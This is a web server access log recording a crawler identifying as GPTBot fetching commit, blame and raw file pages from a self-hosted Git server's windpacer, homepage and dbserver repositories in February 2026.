git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 387770] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:14:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 130636] [Gzip 16.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:14:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176797] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:14:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176768] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:14:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176794] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:14:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/wiki" [Client 74.7.227.38] [Length 7375] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 130618] [Gzip 16.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:14:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10466] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 130663] [Gzip 16.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10464] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10466] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 558416] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" -[17/Feb/2026:14:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659888] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" -[17/Feb/2026:14:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659889] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659892] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10170] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10193] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" -[17/Feb/2026:14:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:14:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:14:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:14:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:14:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9939] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:14:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13343] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:14:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 10233] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 10262] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11400] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" -[17/Feb/2026:14:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json?display=source" [Client 74.7.227.38] [Length 11465] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:14:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12294] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" -[17/Feb/2026:14:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10651] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" -[17/Feb/2026:14:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10642] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" -[17/Feb/2026:14:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10673] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" -[17/Feb/2026:14:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12369] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 10856] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:14:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12371] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11694] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:14:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110365] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 10918] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 